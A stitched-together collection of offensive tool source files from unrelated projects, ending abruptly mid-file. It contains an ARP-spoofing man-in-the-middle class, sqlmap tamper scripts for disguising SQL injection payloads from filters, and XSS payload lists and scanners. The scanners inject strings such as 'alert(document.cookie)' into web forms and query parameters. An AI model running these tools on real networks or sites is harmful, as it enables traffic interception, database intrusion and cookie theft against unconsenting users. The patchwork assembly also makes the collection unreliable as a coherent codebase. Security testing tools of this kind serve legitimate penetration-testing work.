import netifaces
import subprocess
import os
import ipaddress
from scapy.all import ARP, Ether, sendp
import logging
import time

logging.basicConfig(
    level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s"
)


class MITMAttack:
    def set_attributes(self, target_ip, gateway_ip, interface):
        self.target_ip = target_ip
        self.gateway_ip = gateway_ip
        self.interface = interface
        self.mac = self.get_interface_mac(self.interface)
        self.broadcast = "ff:ff:ff:ff:ff:ff"

    def get_interface_mac(self, interface):
        try:
            return netifaces.ifaddresses(interface)[netifaces.AF_LINK][0]["addr"]
        except ValueError:
            raise ValueError(f"Invalid interface '{interface}'")

    def validate_ip(self, ip):
        try:
            return ipaddress.IPv4Address(ip)
        except ipaddress.AddressValueError:
            raise ValueError(f"Invalid IP address '{ip}'")

    def _create_arp_response(self, source_ip, target_ip, target_mac):
        return Ether(src=self.mac, dst=target_mac) / ARP(
            op=2, hwsrc=self.mac, hwdst=target_mac, psrc=source_ip, pdst=target_ip
        )

    def run_attack(self):
        arp_response_target = self._create_arp_response(
            self.gateway_ip, self.target_ip, self.broadcast
        )
        arp_response_gateway = self._create_arp_response(
            self.target_ip, self.gateway_ip, self.broadcast
        )

        logging.info("MITM Running... Press Ctrl+C to stop the attack.")
        try:
            while True:
                sendp(arp_response_target, iface=self.interface)
                sendp(arp_response_gateway, iface=self.interface)
                time.sleep(2)  # Add sleep to prevent overloading the network
        except KeyboardInterrupt:
            logging.info("\nMITM Attack Stopped.")

    def mitm6(
        self,
        interface=None,
        localdomain=None,
        ipv4=None,
        ipv6=None,
        mac=None,
        relay_target=None,
    ):
        logging.info(
            "Attacking {} with packets from {}...".format(interface, ipv4 or ipv6)
        )
        path_to_executable = os.path.join(os.path.dirname(__file__), "mitm/mitm6.py")
        command = [
            "python3",
            path_to_executable,
            f" -i {str(interface)}" if interface else "",
            f" -l {str(localdomain)}" if localdomain else "",
            f" -4 {str(ipv4)}" if ipv4 else "",
            f" -6 {str(ipv6)}" if ipv6 else "",
            f" -m {str(mac)}" if mac else "",
            f" -r {str(relay_target)}" if relay_target else "",
        ]
        subprocess.run(command)



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.convert import getOrds
from plugins.generic.syntax import Syntax as GenericSyntax


class Syntax(GenericSyntax):
    @staticmethod
    def escape(expression, quote=True):
        """
        Note: PostgreSQL has a general problem with concenation operator (||) precedence (hence the parentheses enclosing)
              e.g. SELECT 1 WHERE 'a'!='a'||'b' will trigger error ("argument of WHERE must be type boolean, not type text")

        >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT (CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104)) FROM foobar"
        True
        """

        def escaper(value):
            return "(%s)" % "||".join(
                "CHR(%d)" % _ for _ in getOrds(value)
            )  # Postgres CHR() function already accepts Unicode code point of character(s)

        return Syntax._escape(expression, quote, escaper)



import random


__PRIORITY__ = 5


def tamper(script):
    start_tag = ">"
    fillers = (
        "javascript:/*--></script>",
        "</title></style><svg/onload='alert(1);'/>",
        "</style><svg/onload='alert(1);'/>",
        "</textarea></title><button onclick='alert(1);'/>xanxss</textarea>",
        "<vulnerable>test</vulnerable>",
        "<img src=x onerror=alert(1)>",
        "<script>alert(1);</script>",
    )
    retval = []
    for c in script:
        if c == start_tag:
            c = "{}".format(random.choice(fillers))
        retval.append(c)
    return "".join(retval)



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import os
import re

from lib.core.common import singleTimeWarnMessage
from lib.core.convert import decodeHex
from lib.core.convert import getOrds
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def dependencies():
    singleTimeWarnMessage(
        "tamper script '%s' is only meant to be run against %s"
        % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)
    )


def tamper(payload, **kwargs):
    """Replaces each (MySQL) 0x<hex> encoded string with equivalent
    CONCAT(CHAR(),...) counterpart.

    Requirement:
        * MySQL

    Tested against:
        * MySQL 4, 5.0 and 5.5

    Notes:
        * Useful in cases when web application does the upper casing

    >>> tamper('SELECT 0xdeadbeef')
    'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'
    """

    retVal = payload

    if payload:
        for match in re.finditer(r"\b0x([0-9a-f]+)\b", retVal):
            if len(match.group(1)) > 2:
                result = "CONCAT(%s)" % ",".join(
                    "CHAR(%d)" % _ for _ in getOrds(decodeHex(match.group(1)))
                )
            else:
                result = "CHAR(%d)" % ord(decodeHex(match.group(1)))
            retVal = retVal.replace(match.group(0), result)

    return retVal



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.takeover import Takeover as GenericTakeover


class Takeover(GenericTakeover):
    def osCmd(self):
        errMsg = "on H2 it is not possible to execute commands"
        raise SqlmapUnsupportedFeatureException(errMsg)

    def osShell(self):
        errMsg = "on H2 it is not possible to execute commands"
        raise SqlmapUnsupportedFeatureException(errMsg)

    def osPwn(self):
        errMsg = "on H2 it is not possible to establish an "
        errMsg += "out-of-band connection"
        raise SqlmapUnsupportedFeatureException(errMsg)

    def osSmb(self):
        errMsg = "on H2 it is not possible to establish an "
        errMsg += "out-of-band connection"
        raise SqlmapUnsupportedFeatureException(errMsg)



#!/usr/bin/env python
"""
cloak.py - Simple file encryption/compression utility

Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from __future__ import print_function

import os
import struct
import sys
import zlib

from optparse import OptionError
from optparse import OptionParser

if sys.version_info >= (3, 0):
    xrange = range
    ord = lambda _: _

KEY = b"E6wRbVhD0IBeCiGJ"


def xor(message, key):
    return b"".join(
        struct.pack("B", ord(message[i]) ^ ord(key[i % len(key)]))
        for i in range(len(message))
    )


def cloak(inputFile=None, data=None):
    if data is None:
        with open(inputFile, "rb") as f:
            data = f.read()

    return xor(zlib.compress(data), KEY)


def decloak(inputFile=None, data=None):
    if data is None:
        with open(inputFile, "rb") as f:
            data = f.read()
    try:
        data = zlib.decompress(xor(data, KEY))
    except Exception as ex:
        print(ex)
        print(
            "ERROR: the provided input file '%s' does not contain valid cloaked content"
            % inputFile
        )
        sys.exit(1)
    finally:
        f.close()

    return data


def main():
    usage = "%s [-d] -i <input file> [-o <output file>]" % sys.argv[0]
    parser = OptionParser(usage=usage, version="0.2")

    try:
        parser.add_option("-d", dest="decrypt", action="store_true", help="Decrypt")
        parser.add_option("-i", dest="inputFile", help="Input file")
        parser.add_option("-o", dest="outputFile", help="Output file")

        (args, _) = parser.parse_args()

        if not args.inputFile:
            parser.error("Missing the input file, -h for help")

    except (OptionError, TypeError) as ex:
        parser.error(ex)

    if not os.path.isfile(args.inputFile):
        print("ERROR: the provided input file '%s' is non existent" % args.inputFile)
        sys.exit(1)

    if not args.decrypt:
        data = cloak(args.inputFile)
    else:
        data = decloak(args.inputFile)

    if not args.outputFile:
        if not args.decrypt:
            args.outputFile = args.inputFile + "_"
        else:
            args.outputFile = args.inputFile[:-1]

    f = open(args.outputFile, "wb")
    f.write(data)
    f.close()


if __name__ == "__main__":
    main()



import copy
from fuzzywuzzy import fuzz
import re
from urllib.parse import unquote

from core.config import xsschecker
from core.requester import requester
from core.utils import replaceValue, fillHoles


def checker(url, params, headers, GET, delay, payload, positions, timeout, encoding):
    checkString = "st4r7s" + payload + "3nd"
    if encoding:
        checkString = encoding(unquote(checkString))
    response = requester(
        url,
        replaceValue(params, xsschecker, checkString, copy.deepcopy),
        headers,
        GET,
        delay,
        timeout,
    ).text.lower()
    reflectedPositions = []
    for match in re.finditer("st4r7s", response):
        reflectedPositions.append(match.start())
    filledPositions = fillHoles(positions, reflectedPositions)
    #  Itretating over the reflections
    num = 0
    efficiencies = []
    for position in filledPositions:
        allEfficiencies = []
        try:
            reflected = response[
                reflectedPositions[num] : reflectedPositions[num] + len(checkString)
            ]
            efficiency = fuzz.partial_ratio(reflected, checkString.lower())
            allEfficiencies.append(efficiency)
        except IndexError:
            pass
        if position:
            reflected = response[position : position + len(checkString)]
            if encoding:
                checkString = encoding(checkString.lower())
            efficiency = fuzz.partial_ratio(reflected, checkString)
            if reflected[:-2] == (
                "\\%s" % checkString.replace("st4r7s", "").replace("3nd", "")
            ):
                efficiency = 90
            allEfficiencies.append(efficiency)
            efficiencies.append(max(allEfficiencies))
        else:
            efficiencies.append(0)
        num += 1
    return list(filter(None, efficiencies))



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST


def dependencies():
    pass


def tamper(payload, **kwargs):
    """Replaces apostrophe character (') with its illegal double unicode
    counterpart (e.g. ' -> %00%27)

    >>> tamper("1 AND '1'='1")
    '1 AND %00%271%00%27=%00%271'
    """

    return payload.replace("'", "%00%27") if payload else payload



import random


__PRIORITY__ = 3


def tamper(script):
    retval = []
    fillers = ("/*/", "/+/", "//", "&#13;", "%00", "`", "&#160;")
    for c in script:
        if c == " ":
            c = random.choice(fillers)
        retval.append(c)
    return "".join(retval)



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST


def dependencies():
    pass


def tamper(payload, **kwargs):
    """Splits FROM schema identifiers (e.g. 'testdb.users') with whitespace
    (e.g. 'testdb 9.e.users')

    Requirement:
        * MySQL

    Notes:
        * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf

    >>> tamper('SELECT id FROM testdb.users')
    'SELECT id FROM testdb 9.e.users'
    """

    return (
        re.sub(r"(?i)( FROM \w+)\.(\w+)", r"\g<1> 9.e.\g<2>", payload)
        if payload
        else payload
    )



import json
import random
import re
from urllib.parse import urlparse

import core.config
from core.config import xsschecker


def converter(data, url=False):
    if "str" in str(type(data)):
        if url:
            dictized = {}
            parts = data.split("/")[3:]
            for part in parts:
                dictized[part] = part
            return dictized
        else:
            return json.loads(data)
    else:
        if url:
            url = urlparse(url).scheme + "://" + urlparse(url).netloc
            for part in list(data.values()):
                url += "/" + part
            return url
        else:
            return json.dumps(data)


def counter(string):
    string = re.sub(r"\s|\w", "", string)
    return len(string)


def closest(number, numbers):
    difference = [abs(list(numbers.values())[0]), {}]
    for index, i in numbers.items():
        diff = abs(number - i)
        if diff < difference[0]:
            difference = [diff, {index: i}]
    return difference[1]


def fillHoles(original, new):
    filler = 0
    filled = []
    for x, y in zip(original, new):
        if int(x) == (y + filler):
            filled.append(y)
        else:
            filled.extend([0, y])
            filler += int(x) - y
    return filled


def stripper(string, substring, direction="right"):
    done = False
    strippedString = ""
    if direction == "right":
        string = string[::-1]
    for char in string:
        if char == substring and not done:
            done = True
        else:
            strippedString += char
    if direction == "right":
        strippedString = strippedString[::-1]
    return strippedString


def extractHeaders(headers):
    headers = headers.replace("\\n", "\n")
    sorted_headers = {}
    matches = re.findall(r"(.*):\s(.*)", headers)
    for match in matches:
        header = match[0]
        value = match[1]
        try:
            if value[-1] == ",":
                value = value[:-1]
            sorted_headers[header] = value
        except IndexError:
            pass
    return sorted_headers


def replaceValue(mapping, old, new, strategy=None):
    """Replace old values with new ones following dict strategy.

    The parameter strategy is None per default for inplace operation.
    A copy operation is injected via strateg values like copy.copy
    or copy.deepcopy

    Note: A dict is returned regardless of modifications.
    """
    anotherMap = strategy(mapping) if strategy else mapping
    if old in anotherMap.values():
        for k in anotherMap.keys():
            if anotherMap[k] == old:
                anotherMap[k] = new
    return anotherMap


def getUrl(url, GET):
    if GET:
        return url.split("?")[0]
    else:
        return url


def extractScripts(response):
    scripts = []
    matches = re.findall(r"(?s)<script.*?>(.*?)</script>", response.lower())
    for match in matches:
        if xsschecker in match:
            scripts.append(match)
    return scripts


def randomUpper(string):
    return "".join(
        random.choice((x, y)) for x, y in zip(string.upper(), string.lower())
    )


def flattenParams(currentParam, params, payload):
    flatted = []
    for name, value in params.items():
        if name == currentParam:
            value = payload
        flatted.append(name + "=" + value)
    return "?" + "&".join(flatted)


def genGen(
    fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, badTag=None
):
    vectors = []
    r = randomUpper  # randomUpper randomly converts chars of a string to uppercase
    for tag in tags:
        if tag == "d3v" or tag == "a":
            bait = xsschecker
        else:
            bait = ""
        for eventHandler in eventHandlers:
            # if the tag is compatible with the event handler
            if tag in eventHandlers[eventHandler]:
                for function in functions:
                    for filling in fillings:
                        for eFilling in eFillings:
                            for lFilling in lFillings:
                                for end in ends:
                                    if tag == "d3v" or tag == "a":
                                        if ">" in ends:
                                            end = (  # we can't use // as > with "a" or "d3v" tag
                                                ">"
                                            )
                                    breaker = ""
                                    if badTag:
                                        breaker = "</" + r(badTag) + ">"
                                    vector = (
                                        breaker
                                        + "<"
                                        + r(tag)
                                        + filling
                                        + r(eventHandler)
                                        + eFilling
                                        + "="
                                        + eFilling
                                        + function
                                        + lFilling
                                        + end
                                        + bait
                                    )
                                    vectors.append(vector)
    return vectors


def getParams(url, data, GET):
    params = {}
    if "?" in url and "=" in url:
        data = url.split("?")[1]
        if data[:1] == "?":
            data = data[1:]
    elif data:
        if getVar("jsonData") or getVar("path"):
            params = data
        else:
            try:
                params = json.loads(data.replace("'", '"'))
                return params
            except json.decoder.JSONDecodeError:
                pass
    else:
        return None
    if not params:
        parts = data.split("&")
        for part in parts:
            each = part.split("=")
            if len(each) < 2:
                each.append("")
            try:
                params[each[0]] = each[1]
            except IndexError:
                params = None
    return params


def writer(obj, path):
    kind = str(type(obj)).split("'")[0]
    if kind == "list" or kind == "tuple":
        obj = "\n".join(obj)
    elif kind == "dict":
        obj = json.dumps(obj, indent=4)
    savefile = open(path, "w+")
    savefile.write(str(obj.encode("utf-8")))
    savefile.close()


def reader(path):
    with open(path, "r") as f:
        result = [line.rstrip("\n").encode("utf-8").decode("utf-8") for line in f]
    return result


def js_extractor(response):
    """Extract js files from the response body."""
    scripts = []
    matches = re.findall(r"<(?:script|SCRIPT).*?(?:src|SRC)=([^\s>]+)", response)
    for match in matches:
        match = match.replace("'", "").replace('"', "").replace("`", "")
        scripts.append(match)
    return scripts


def handle_anchor(parent_url, url):
    scheme = urlparse(parent_url).scheme
    if url[:4] == "http":
        return url
    elif url[:2] == "//":
        return scheme + ":" + url
    elif url.startswith("/"):
        host = urlparse(parent_url).netloc
        scheme = urlparse(parent_url).scheme
        parent_url = scheme + "://" + host
        return parent_url + url
    elif parent_url.endswith("/"):
        return parent_url + url
    else:
        return parent_url + "/" + url


def deJSON(data):
    return data.replace("\\\\", "\\")


def getVar(name):
    return core.config.globalVariables[name]


def updateVar(name, data, mode=None):
    if mode:
        if mode == "append":
            core.config.globalVariables[name].append(data)
        elif mode == "add":
            core.config.globalVariables[name].add(data)
    else:
        core.config.globalVariables[name] = data


def isBadContext(position, non_executable_contexts):
    badContext = ""
    for each in non_executable_contexts:
        if each[0] < position < each[1]:
            badContext = each[2]
            break
    return badContext


def equalize(array, number):
    if len(array) < number:
        array.append("")


def escaped(position, string):
    usable = string[:position][::-1]
    match = re.search(r"^\\*", usable)
    if match:
        match = match.group()
        if len(match) == 1:
            return True
        elif len(match) % 2 == 0:
            return False
        else:
            return True
    else:
        return False



import re


def zetanize(response):
    def e(string):
        return string.encode("utf-8")

    def d(string):
        return string.decode("utf-8")

    # remove the content between html comments
    response = re.sub(r"(?s)<!--.*?-->", "", response)
    forms = {}
    matches = re.findall(
        r"(?i)(?s)<form.*?</form.*?>", response
    )  # extract all the forms
    num = 0
    for match in matches:  # everything else is self explanatory if you know regex
        page = re.search(r'(?i)action=[\'"](.*?)[\'"]', match)
        method = re.search(r'(?i)method=[\'"](.*?)[\'"]', match)
        forms[num] = {}
        forms[num]["action"] = d(e(page.group(1))) if page else ""
        forms[num]["method"] = d(e(method.group(1)).lower()) if method else "get"
        forms[num]["inputs"] = []
        inputs = re.findall(r"(?i)(?s)<input.*?>", response)
        for inp in inputs:
            inpName = re.search(r'(?i)name=[\'"](.*?)[\'"]', inp)
            if inpName:
                inpType = re.search(r'(?i)type=[\'"](.*?)[\'"]', inp)
                inpValue = re.search(r'(?i)value=[\'"](.*?)[\'"]', inp)
                inpName = d(e(inpName.group(1)))
                inpType = d(e(inpType.group(1))) if inpType else ""
                inpValue = d(e(inpValue.group(1))) if inpValue else ""
                if inpType.lower() == "submit" and inpValue == "":
                    inpValue = "Submit Query"
                inpDict = {"name": inpName, "type": inpType, "value": inpValue}
                forms[num]["inputs"].append(inpDict)
        num += 1
    return forms



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.data import kb
from lib.request.connect import Connect as Request


def getPageTemplate(payload, place):
    retVal = (kb.originalPage, kb.errorIsNone)

    if payload and place:
        if (payload, place) not in kb.pageTemplates:
            page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
            kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None)

        retVal = kb.pageTemplates[(payload, place)]

    return retVal



#!/usr/bin/env python

# Copyright (c) 2010, Chris Hall <chris.hall@mod10.net>
# All rights reserved.

# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:

# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.

# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

from xml.dom import minidom
from xml.dom import Node


def format(text):
    doc = minidom.parseString(text)
    root = doc.childNodes[0]
    return root.toprettyxml(indent="  ")


def formatXML(doc, encoding=None):
    root = doc.childNodes[0]
    return root.toprettyxml(indent="  ", encoding=encoding)


def _patch_minidom():
    minidom.Text.writexml = _writexml_text
    minidom.Element.writexml = _writexml_element
    minidom.Node.toprettyxml = _toprettyxml_node


def _collapse(node):
    for child in node.childNodes:
        if child.nodeType == Node.TEXT_NODE and len(child.data.strip()) == 0:
            child.data = ""
        else:
            _collapse(child)


def _writexml_text(self, writer, indent="", addindent="", newl=""):
    minidom._write_data(writer, "%s" % (self.data.strip()))


def _writexml_element(self, writer, indent="", addindent="", newl=""):
    # indent = current indentation
    # addindent = indentation to add to higher levels
    # newl = newline string
    writer.write(indent + "<" + self.tagName)

    attrs = self._get_attributes()
    a_names = attrs.keys()
    a_names.sort()

    for a_name in a_names:
        writer.write(' %s="' % a_name)
        minidom._write_data(writer, attrs[a_name].value)
        writer.write('"')
    if self.childNodes:
        if (
            self.childNodes[0].nodeType == Node.TEXT_NODE
            and len(self.childNodes[0].data) > 0
        ):
            writer.write(">")
        else:
            writer.write(">%s" % (newl))
        for node in self.childNodes:
            node.writexml(writer, indent + addindent, addindent, newl)
        if (
            self.childNodes[-1].nodeType == Node.TEXT_NODE
            and len(self.childNodes[0].data) > 0
        ):
            writer.write("</%s>%s" % (self.tagName, newl))
        else:
            writer.write("%s</%s>%s" % (indent, self.tagName, newl))
    else:
        writer.write("/>%s" % (newl))


def _toprettyxml_node(self, indent="\t", newl="\n", encoding=None):
    _collapse(self)
    # indent = the indentation string to prepend, per level
    # newl = the newline string to append
    writer = minidom._get_StringIO()
    if encoding is not None:
        import codecs

        # Can't use codecs.getwriter to preserve 2.0 compatibility
        writer = codecs.lookup(encoding)[3](writer)
    if self.nodeType == Node.DOCUMENT_NODE:
        # Can pass encoding only to document, to put it into XML header
        self.writexml(writer, "", indent, newl, encoding)
    else:
        self.writexml(writer, "", indent, newl)
    return writer.getvalue()


_patch_minidom()



import argparse


class StoreDictKeyPairs(argparse.Action):
    """Custom action to create a dict from a provided string in the format of
    key=value."""

    retval = {}

    def __call__(self, parser, namespace, values, option_string=None):
        for kv in values.split(","):
            if ":" in kv:
                splitter = ":"
            else:
                splitter = "="
            if kv.count(splitter) != 1:
                first_equal_index = kv.index(splitter)
                key = kv[:first_equal_index].strip()
                value = kv[first_equal_index + 1 :].strip()
                self.retval[key] = value
            else:
                k, v = kv.split(splitter)
                self.retval[k.strip()] = v.strip()
        setattr(namespace, self.dest, self.retval)


class OptParser(argparse.ArgumentParser):
    def __init__(self):
        super(OptParser, self).__init__()

    @staticmethod
    def opts():
        parser = argparse.ArgumentParser()
        parser.add_argument(
            "-u",
            "--url",
            dest="urlToUse",
            metavar="http://test.com/test.php?id=",
            help=(
                "pass a URL to test for XSS vulnerabilities. it is recommended that you"
                " use a URL with a query parameter"
            ),
        )
        parser.add_argument(
            "-a",
            "--amount",
            type=int,
            dest="verificationAmount",
            metavar="VERIFY",
            help=(
                "how many verifications steps to be taken, this will determine how"
                " reliable the payload is. the more verification steps the more"
                " reliable the payload will be (*default=5)"
            ),
        )
        parser.add_argument(
            "-f",
            "--find",
            type=int,
            dest="amountToFind",
            metavar="AMOUNT",
            help=(
                "attempt to find this amount of working payloads, specifying this does"
                " not guarantee you will find this amount of working payloads"
                " (*default=25)"
            ),
        )
        parser.add_argument(
            "-t",
            "--time",
            type=int,
            dest="testTime",
            metavar="TIME",
            help=(
                "amount of time in seconds to spend on testing, this will be used as a"
                " timer for the verification (*default=35s)"
            ),
        )
        parser.add_argument(
            "-p",
            "--payloads",
            nargs="+",
            dest="providedPayloads",
            metavar=("SCRIPT,", "SCRIPT,"),
            help=(
                "pass a comma separated list of your own payloads, must contain at"
                " least 5 payloads"
            ),
        )
        parser.add_argument(
            "-F",
            "--file",
            dest="payloadFile",
            metavar="FILE-PATH",
            help=(
                "pass a textual file containing payloads one per line, must contain at"
                " least 5 payloads"
            ),
        )
        parser.add_argument(
            "-v",
            "--verbose",
            action="store_true",
            dest="runVerbose",
            help="run in verbose mode and display more output (*default=False)",
        )
        parser.add_argument(
            "--proxy",
            dest="proxyToUse",
            metavar="TYPE://IP:PORT",
            help="pass a proxy in the format type://ip:port",
        )
        parser.add_argument(
            "-H",
            "--headers",
            dest="extraHeaders",
            action=StoreDictKeyPairs,
            metavar="HEADER=VALUE,HEADER:VALUE",
            help=(
                "add your own custom headers to the request"
                " (*default=connection,user-agent)"
            ),
        )
        parser.add_argument(
            "--throttle",
            type=int,
            dest="throttleTime",
            metavar="TIME (secs)",
            default=0,
            help="throttle each request with a sleep time (*default=0)",
        )
        parser.add_argument(
            "-P",
            "--polyglot",
            action="store_true",
            dest="genPolyglot",
            help=(
                "generate a polyglot script to append to the end of the running"
                " scripts, if there is XSS this should find it (*default=False)"
            ),
        )
        parser.add_argument(
            "--prefix",
            dest="usePrefix",
            metavar="PREFIX",
            default="",
            help=(
                "choose a prefix to use for the payloads, this will be used at the"
                " start of each payload (*default=None)"
            ),
        )
        parser.add_argument(
            "--suffix",
            dest="useSuffix",
            metavar="SUFFIX",
            default="",
            help="choose a suffix to append to the end of the payloads (*default=None)",
        )
        return parser.parse_args()



from .helper.helper import *
from random import randint
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse, parse_qs, urlencode
from .helper.Log import *


class core:
    @classmethod
    def generate(self, eff):
        FUNCTION = [
            "prompt(5000/200)",
            "alert(6000/3000)",
            "alert(document.cookie)",
            "prompt(document.cookie)",
            "console.log(5000/3000)",
        ]
        if eff == 1:
            return "<script/>" + FUNCTION[randint(0, 4)] + "<\script\>"

        elif eff == 2:
            return "<\script/>" + FUNCTION[randint(0, 4)] + "<\\script>"

        elif eff == 3:
            return "<\script\> " + FUNCTION[randint(0, 4)] + "<//script>"

        elif eff == 4:
            return "<script>" + FUNCTION[randint(0, 4)] + "<\script/>"

        elif eff == 5:
            return "<script>" + FUNCTION[randint(0, 4)] + "<//script>"

        elif eff == 6:
            return "<script>" + FUNCTION[randint(0, 4)] + "</script>"

    @classmethod
    def post_method(self):
        Log.info("post method")
        bsObj = BeautifulSoup(self.body, "html.parser")
        forms = bsObj.find_all("form", method=True)

        for form in forms:
            try:
                action = form["action"]
            except KeyError:
                action = self.url

            if form["method"].lower().strip() == "post":
                Log.warning(
                    "Target have form with POST method: "
                    + C
                    + urljoin(self.url, action)
                )
                Log.info("Collecting form input key.....")

                keys = {}
                for key in form.find_all(["input", "textarea"]):
                    try:
                        if key["type"] == "submit":
                            Log.info(
                                "Form key name: "
                                + G
                                + key["name"]
                                + N
                                + " value: "
                                + G
                                + "<Submit Confirm>"
                            )
                            keys.update({key["name"]: key["name"]})

                        else:
                            Log.info(
                                "Form key name: "
                                + G
                                + key["name"]
                                + N
                                + " value: "
                                + G
                                + self.payload
                            )
                            keys.update({key["name"]: self.payload})

                    except Exception as e:
                        Log.info("Internal error: " + str(e))

                Log.info("Sending payload (POST) method...")
                req = self.session.post(urljoin(self.url, action), data=keys)
                if self.payload in req.text:
                    Log.high("Detected XSS (POST) at " + urljoin(self.url, req.url))
                    Log.high("Post data: " + str(keys))
                else:
                    Log.info(
                        "This page is safe from XSS (POST) attack but not 100% yet..."
                    )

    @classmethod
    def get_method_form(self):
        Log.info("get method form")
        bsObj = BeautifulSoup(self.body, "html.parser")
        forms = bsObj.find_all("form", method=True)

        for form in forms:
            try:
                action = form["action"]
            except KeyError:
                action = self.url

            if form["method"].lower().strip() == "get":
                Log.warning(
                    "Target have form with GET method: " + C + urljoin(self.url, action)
                )
                Log.info("Collecting form input key.....")

                keys = {}
                for key in form.find_all(["input", "textarea"]):
                    try:
                        if key["type"] == "submit":
                            Log.info(
                                "Form key name: "
                                + G
                                + key["name"]
                                + N
                                + " value: "
                                + G
                                + "<Submit Confirm>"
                            )
                            keys.update({key["name"]: key["name"]})

                        else:
                            Log.info(
                                "Form key name: "
                                + G
                                + key["name"]
                                + N
                                + " value: "
                                + G
                                + self.payload
                            )
                            keys.update({key["name"]: self.payload})

                    except Exception as e:
                        Log.info("Internal error: " + str(e))
                        try:
                            Log.info(
                                "Form key name: "
                                + G
                                + key["name"]
                                + N
                                + " value: "
                                + G
                                + self.payload
                            )
                            keys.update({key["name"]: self.payload})
                        except KeyError as e:
                            Log.info("Internal error: " + str(e))

                Log.info("Sending payload (GET) method...")
                req = self.session.get(urljoin(self.url, action), params=keys)
                if self.payload in req.text:
                    Log.high("Detected XSS (GET) at " + urljoin(self.url, req.url))
                    Log.high("GET data: " + str(keys))
                else:
                    Log.info(
                        "This page is safe from XSS (GET) attack but not 100% yet..."
                    )

    @classmethod
    def get_method(self):
        Log.info("get method")
        bsObj = BeautifulSoup(self.body, "html.parser")
        links = bsObj.find_all("a", href=True)
        for a in links:
            url = a["href"]
            if (
                url.startswith("http://") is False
                or url.startswith("https://") is False
                or url.startswith("mailto:") is False
            ):
                Log.warning("Found link: " + C + urljoin(self.url, a["href"]))
                base = urljoin(self.url, a["href"])
                query = urlparse(base).query
                if query != "":
                    Log.warning(
                        "Found link with query: "
                        + G
                        + query
                        + N
                        + " Maybe a vuln XSS point"
                    )

                    query_payload = query.replace(
                        query[query.find("=") + 1 : len(query)], self.payload, 1
                    )
                    test = base.replace(query, query_payload, 1)

                    query_all = base.replace(
                        query, urlencode({x: self.payload for x in parse_qs(query)})
                    )

                    Log.info("Query (GET) : " + test)
                    Log.info("Query (GET) : " + query_all)

                    _respon = self.session.get(test)
                    if (
                        self.payload in _respon.text
                        or self.payload in self.session.get(query_all).text
                    ):
                        Log.high("Detected XSS (GET) at " + _respon.url)
                    else:
                        Log.info(
                            "This page is safe from XSS (GET) attack but not 100%"
                            " yet..."
                        )

    @classmethod
    def main(self, url, proxy, headers, payload, cookie, method=2):
        print(W + "*" * 15)
        self.payload = payload
        self.url = url

        self.session = session(proxy, headers, cookie)
        Log.info("Checking connection to: " + Y + url)
        try:
            ctr = self.session.get(url)
            self.body = ctr.text
        except Exception as e:
            Log.high("Internal error: " + str(e))
            return

        if ctr.status_code > 400:
            Log.info("Connection failed " + G + str(ctr.status_code))
            return
        else:
            Log.info("Connection estabilished " + G + str(ctr.status_code))

        if method >= 2:
            self.post_method()
            self.get_method()
            self.get_method_form()
            Log.info("XSSCon method 2")

        elif method == 1:
            self.post_method()

        elif method == 0:
            self.get_method()
            self.get_method_form()



#!/usr/bin/python3
import difflib, http.client, itertools, optparse, random, re, urllib, urllib.parse, urllib.request  # Python 3 required

NAME, VERSION, AUTHOR, LICENSE = "Damn Small SQLi Scanner (DSSS) < 100 LoC (Lines of Code)", "0.3b", "Miroslav Stampar (@stamparm)", "Public domain (FREE)"

